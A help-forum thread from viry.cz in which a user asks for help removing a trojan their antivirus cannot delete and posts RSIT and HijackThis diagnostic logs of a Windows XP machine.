VIRY.CZ

Pomáháme v boji s počítačovou havěti!
https://forum.viry.cz:443/

virus nejde odstranit antivirom

https://forum.viry.cz:443/viewtopic.php?t=123044

Stránka 1 z 2

virus nejde odstranit antivirom

Napsal: 18 črc 2012 13:20
od hunterwx
cavte vsetci potreboval by som od vas velmi poradit neviem aky to je presne virus ale nejde mi odstranit mal by sa nachadzat niekde vo win32 a je to nejaky trojsky kon ale neviem presne aky prikladam log z RSIT a prosim o pomoc ( prepacte som tu novy ak som porusil nejake pravidlo tak sa ospravedlnujem viac krat sa to nezopakuje

Logfile of random's system information tool 1.06 (written by random/random)
Run by Monička at 2012-07-18 14:19:03
Systém Microsoft Windows XP Professional Service Pack 3
System drive C: has 16 GB (11%) free of 150 GB
Total RAM: 2046 MB (48% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 13:05:38, on 18.7.2012
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\WINDOWS\RTHDCPL.EXE
C:\WINDOWS\BricoPacks\Vista Inspirat 2\RocketDock\RocketDock.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\Program Files\ICQ6Toolbar\ICQ Service.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\PnkBstrA.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\msiexec.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\ICQ7.4\ICQ.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Monička\Desktop\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.sk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R3 - URLSearchHook: ICQToolBar - {855F3B16-6D32-4fe6-8A56-BBB695989046} - C:\Program Files\ICQ6Toolbar\ICQToolBar.dll
O2 - BHO: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O2 - BHO: MegaIEMn - {bf00e119-21a3-4fd1-b178-3b8537e75c92} - C:\Program Files\Megaupload\Mega Manager\MegaIEMn.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: EpsonToolBandKicker Class - {E99421FB-68DD-40F0-B4AC-B7027CAE2F1A} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: EPSON Web-To-Page - {EE5D279F-081B-4404-994D-C6B60AAEBA6D} - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll
O3 - Toolbar: ICQToolBar - {855F3B16-6D32-4fe6-8A56-BBB695989046} - C:\Program Files\ICQ6Toolbar\ICQToolBar.dll
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Common Files\Java\Java Update\jusched.exe"
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [egui] "C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe" /hide /waitservice
O4 - HKCU\..\Run: [NBJ] "C:\Program Files\Ahead\Nero BackItUp\NBJ.exe"
O4 - HKCU\..\Run: [AlcoholAutomount] "C:\Program Files\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe" -automount
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Startup: RocketDock.lnk = C:\WINDOWS\BricoPacks\Vista Inspirat 2\RocketDock\RocketDock.exe
O4 - Startup: TransBar.lnk = C:\WINDOWS\BricoPacks\Vista Inspirat 2\TransBar\TransBar.exe
O4 - Startup: Yahoo! Widgets.lnk = C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe
O8 - Extra context menu item: E&xportovať do programu Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Odoslať do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Od&oslať do programu OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: ICQ7.4 - {73C6DCFB-B606-47F3-BDFA-9A4FBF931E37} - C:\Program Files\ICQ7.4\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ7.4 - {73C6DCFB-B606-47F3-BDFA-9A4FBF931E37} - C:\Program Files\ICQ7.4\ICQ.exe
O9 - Extra button: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra 'Tools' menuitem: Skype Click to Call - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Monička\Start Menu\Programs\IMVU\Run IMVU.lnk
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Program Files\ICQ6.5\ICQ.exe
O9 - Extra 'Tools' menuitem: ICQ6 - {E59EB121-F339-4851-A3BA-FE49C35617C2} - C:\Program Files\ICQ6.5\ICQ.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper.dll
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll
O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: ##Id_String1.6844F930_1628_4223_B5CC_5BB94B879762## (Bonjour Service) - Apple Computer, Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Eset HTTP Server (EhttpSrv) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe
O23 - Service: Eset Service (ekrn) - ESET - C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
O23 - Service: Firebird Guardian - DefaultInstance (FirebirdGuardianDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbguard.exe
O23 - Service: Firebird Server - DefaultInstance (FirebirdServerDefaultInstance) - FirebirdSQL Project - C:\Program Files\Firebird\Firebird_2_1\bin\fbserver.exe
O23 - Service: FLEXnet Licensing Service - Macrovision Europe Ltd. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: Google Update Service (gupdate) (gupdate) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Služba Google Update (gupdatem) (gupdatem) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: ICQ Service - Unknown owner - C:\Program Files\ICQ6Toolbar\ICQ Service.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINDOWS\system32\PnkBstrA.exe
O23 - Service: StarWind AE Service (StarWindServiceAE) - StarWind Software - C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe

--
End of file - 10229 bytes

======Scheduled tasks folder======

C:\WINDOWS\tasks\Adobe Flash Player Updater.job
C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
C:\WINDOWS\tasks\Scheduled Update for Ask Toolbar.job

======Registry dump======

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}]
Groove GFS Browser Helper - C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre6\bin\ssv.dll [2011-11-10 325408]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Windows Live ID Sign-in Helper - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18 403840]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Browser Helper - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2011-10-10 3834016]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{bf00e119-21a3-4fd1-b178-3b8537e75c92}]
IeMonitorBho Class - C:\Program Files\Megaupload\Mega Manager\MegaIEMn.dll [2011-07-26 109568]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2011-11-10 42272]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2011-11-10 79648]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E99421FB-68DD-40F0-B4AC-B7027CAE2F1A}]
EpsonToolBandKicker Class - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll [2005-02-22 368640]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{EE5D279F-081B-4404-994D-C6B60AAEBA6D} - EPSON Web-To-Page - C:\Program Files\EPSON\EPSON Web-To-Page\EPSON Web-To-Page.dll [2005-02-22 368640]
{855F3B16-6D32-4fe6-8A56-BBB695989046} - ICQToolBar - C:\Program Files\ICQ6Toolbar\ICQToolBar.dll [2008-06-12 958712]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"NvCplDaemon"=C:\WINDOWS\system32\NvCpl.dll [2008-09-11 13574144]
"nwiz"=nwiz.exe /install []
"GrooveMonitor"=C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [2009-02-26 30040]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"NeroFilterCheck"=C:\WINDOWS\system32\NeroCheck.exe [2001-07-09 155648]
"NvMediaCenter"=C:\WINDOWS\system32\NvMcTray.dll [2008-09-11 86016]
"SunJavaUpdateSched"=C:\Program Files\Common Files\Java\Java Update\jusched.exe [2011-06-09 254696]
"RTHDCPL"=C:\WINDOWS\RTHDCPL.EXE [2008-02-13 16857600]
"egui"=C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [2008-07-01 1447168]
"COMODO"=C:\Program Files\COMODO\COMODO GeekBuddy\CLPSLA.exe [2011-11-23 208184]
"CPA"=C:\Program Files\COMODO\COMODO GeekBuddy\VALA.exe [2011-11-23 182584]
"COMODO Internet Security"=C:\Program Files\COMODO\COMODO Internet Security\cfp.exe [2012-03-11 6749512]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"NBJ"=C:\Program Files\Ahead\Nero BackItUp\NBJ.exe [2005-09-16 1961984]
"AlcoholAutomount"=C:\Program Files\Alcohol Soft\Alcohol 120\AxAutoMntSrv.exe [2010-08-20 33120]
"ctfmon.exe"=C:\WINDOWS\system32\ctfmon.exe [2008-04-14 15360]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\LogMeIn Hamachi Ui]
C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [2012-06-27 1996200]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TBPanel]
C:\Program Files\Vtune\TBPanel.exe [2008-09-05 2154496]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\WinampAgent]
C:\Program Files\Winamp\winampa.exe [2008-08-04 36352]

C:\Documents and Settings\Monička\Start Menu\Programs\Startup
Adobe Gamma.lnk - C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
RocketDock.lnk - C:\WINDOWS\BricoPacks\Vista Inspirat 2\RocketDock\RocketDock.exe
TransBar.lnk - C:\WINDOWS\BricoPacks\Vista Inspirat 2\TransBar\TransBar.exe
Yahoo! Widgets.lnk - C:\Program Files\Yahoo!\Widgets\YahooWidgets.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLS"=" C:\WINDOWS\system32\guard32.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WgaLogon]
C:\WINDOWS\system32\WgaLogon.dll [2001-10-26 3584]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
"{B5A7F190-DDA6-4420-B3BA-52453494E6CD}"=C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2009-02-26 2217832]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CLPSLS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CLPSLS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Hamachi2Svc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Wdf01000.sys]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveAutoRun"=67108863
"NoDrives"=0
"NoDriveTypeAutoRun"=323

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=
"NoDriveAutoRun"=
"NoDriveTypeAutoRun"=
"NoDrives"=

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE"="C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook"
"C:\Program Files\Microsoft Office\Office12\GROOVE.EXE"="C:\Program Files\Microsoft Office\Office12\GROOVE.EXE:*:Enabled:Microsoft Office Groove"
"C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE"="C:\Program Files\Microsoft Office\Office12\ONENOTE.EXE:*:Enabled:Microsoft Office OneNote"
"C:\Program Files\Activision\Call of Duty 2\CoD2MP_s.exe"="C:\Program Files\Activision\Call of Duty 2\CoD2MP_s.exe:*:Enabled:CoD2MP_s"
"C:\Program Files\Bonjour\mDNSResponder.exe"="C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour"
"C:\WINDOWS\system32\PnkBstrA.exe"="C:\WINDOWS\system32\PnkBstrA.exe:*:Enabled:PnkBstrA"
"C:\WINDOWS\system32\PnkBstrB.exe"="C:\WINDOWS\system32\PnkBstrB.exe:*:Enabled:PnkBstrB"
"C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx9.exe"="C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx9.exe:*:Enabled:Assassin's Creed Dx9"
"C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx10.exe"="C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Dx10.exe:*:Enabled:Assassin's Creed Dx10"
"C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Launcher.exe"="C:\Program Files\Ubisoft\Assassin's Creed\AssassinsCreed_Launcher.exe:*:Enabled:Assassin's Creed Update"
"C:\Program Files\Opera\opera.exe"="C:\Program Files\Opera\opera.exe:*:Enabled:Opera Internet Browser"
"C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe"="C:\Program Files\SpacialAudio\SAMBC\SAMBC.exe:*:Enabled:SAMBC"
"C:\Program Files\TeamViewer\Version5\TeamViewer.exe"="C:\Program Files\TeamViewer\Version5\TeamViewer.exe:*:Enabled:Teamviewer Remote Control Application"
"C:\Program Files\VideoLAN\VLC\vlc.exe"="C:\Program Files\VideoLAN\VLC\vlc.exe:*:Enabled:VLC media player"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\Java\jre6\bin\javaw.exe"="C:\Program Files\Java\jre6\bin\javaw.exe:*:Enabled:Java(TM) Platform SE binary"
"C:\Program Files\Ares\Ares.exe"="C:\Program Files\Ares\Ares.exe:*:Enabled:Ares p2p for windows"
"C:\totalcmd\TOTALCMD.EXE"="C:\totalcmd\TOTALCMD.EXE:*:Enabled:Total Commander 32 bit"
"C:\Program Files\ICQ7.4\ICQ.exe"="C:\Program Files\ICQ7.4\ICQ.exe:*:Enabled:ICQ7.4"
"C:\Program Files\ICQ6.5\ICQ.exe"="C:\Program Files\ICQ6.5\ICQ.exe:*:Enabled:ICQ6"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBSP.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBSP.exe:*:Enabled:Assassin's Creed Brotherhood"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBMP.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\ACBMP.exe:*:Enabled:Assassin's Creed Brotherhood Multiplayer"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\AssassinsCreedBrotherhood.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\AssassinsCreedBrotherhood.exe:*:Enabled:Assassin's Creed Brotherhood Update"
"D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\UPlayBrowser.exe"="D:\Program Files\Ubisoft\Assassin's Creed Brotherhood\UPlayBrowser.exe:*:Enabled:Assassin's Creed Brotherhood Uplay"
"C:\Program Files\Google\Google Earth\client\googleearth.exe"="C:\Program Files\Google\Google Earth\client\googleearth.exe:*:Enabled:Google Earth"
"C:\Program Files\TeamViewer\Version6\TeamViewer.exe"="C:\Program Files\TeamViewer\Version6\TeamViewer.exe:*:Enabled:Teamviewer Remote Control Application"
"C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe"="C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe:*:Enabled:Teamviewer Remote Control Service"
"D:\MY DOKUMENTS\Programs\SweetImSetup.exe"="D:\MY DOKUMENTS\Programs\SweetImSetup.exe:*:Enabled:SweetIM Installer"
"C:\Program Files\Winamp\winamp.exe"="C:\Program Files\Winamp\winamp.exe:*:Enabled:Winamp"
"C:\WINDOWS\system32\spool\drivers\w32x86\3\E_DUPA20.EXE"="C:\WINDOWS\system32\spool\drivers\w32x86\3\E_DUPA20.EXE:*:Enabled:EPSON Driver Update"
"C:\Program Files\Codemasters\F1 2011\F1_2011.exe"="C:\Program Files\Codemasters\F1 2011\F1_2011.exe:*:Enabled:F1 2011"
"C:\Program Files\Skype\Phone\Skype.exe"="C:\Program Files\Skype\Phone\Skype.exe:*:Enabled:Skype"
"C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe"="C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe:*:Enabled:LogMeIn Hamachi"
"C:\Program Files\Opera\pluginwrapper\opera_plugin_wrapper.exe"="C:\Program Files\Opera\pluginwrapper\opera_plugin_wrapper.exe:*:Enabled:Opera Internet Browser - Plugin wrapper"
"C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe"="C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe:*:Enabled:Ubisoft Game Launcher"
"C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRSP.exe"="C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRSP.exe:*:Enabled:Assassin's Creed Revelations"
"C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRMP.exe"="C:\Program Files\Ubisoft\Assassin's Creed Revelations\ACRMP.exe:*:Enabled:Assassin's Creed Revelations Multiplayer"
"C:\Program Files\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe"="C:\Program Files\Ubisoft\Assassin's Creed Revelations\AssassinsCreedRevelations.exe:*:Enabled:Assassin's Creed Revelations Update"

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"%windir%\Network Diagnostic\xpnetdiag.exe"="%windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000"
"C:\Program Files\ICQ7.4\ICQ.exe"="C:\Program Files\ICQ7.4\ICQ.exe:*:Enabled:ICQ7.4"

======List of files/folders created in the last 1 months======

2012-07-18 14:19:03 ----D---- C:\rsit
2012-07-18 13:16:33 ----D---- C:\Documents and Settings\All Users\Application Data\CPA_VA
2012-07-18 13:12:15 ----D---- C:\Documents and Settings\All Users\Application Data\Comodo
2012-07-18 13:12:08 ----D---- C:\Program Files\COMODO
2012-07-18 13:12:08 ----A---- C:\WINDOWS\system32\gdiplus.dll
2012-07-18 12:56:55 ----SHD---- C:\RECYCLER
2012-07-18 12:13:19 ----A---- C:\WINDOWS\system32\FlashPlayerInstaller.exe
2012-07-18 11:58:00 ----A---- C:\ComboFix.txt
2012-07-18 11:57:56 ----A---- C:\WINDOWS\SchedLgU.Txt
2012-07-18 11:00:36 ----D---- C:\ComboFix
2012-07-11 17:20:13 ----DC---- C:\WINDOWS\$NtUninstallKB2691442$
2012-07-11 17:20:08 ----DC---- C:\WINDOWS\$NtUninstallKB2718523$
2012-07-11 17:19:24 ----DC---- C:\WINDOWS\$NtUninstallKB2655992$
2012-07-11 17:18:34 ----DC---- C:\WINDOWS\$NtUninstallKB2719985$
2012-07-11 17:16:48 ----DC---- C:\WINDOWS\$NtUninstallKB2698365$

======List of files/folders modified in the last 1 months======

2012-07-18 14:19:11 ----D---- C:\WINDOWS\temp
2012-07-18 13:53:31 ----D---- C:\Program Files\Mozilla Firefox
2012-07-18 13:47:20 ----D---- C:\Program Files\DontAngry!
2012-07-18 13:22:47 ----SHD---- C:\WINDOWS\Installer
2012-07-18 13:16:02 ----D---- C:\WINDOWS\system32\CatRoot2
2012-07-18 13:15:54 ----D---- C:\WINDOWS
2012-07-18 13:15:16 ----D---- C:\WINDOWS\system32\drivers
2012-07-18 13:13:22 ----D---- C:\Config.Msi
2012-07-18 13:12:20 ----D---- C:\WINDOWS\system32
2012-07-18 13:12:08 ----D---- C:\Program Files
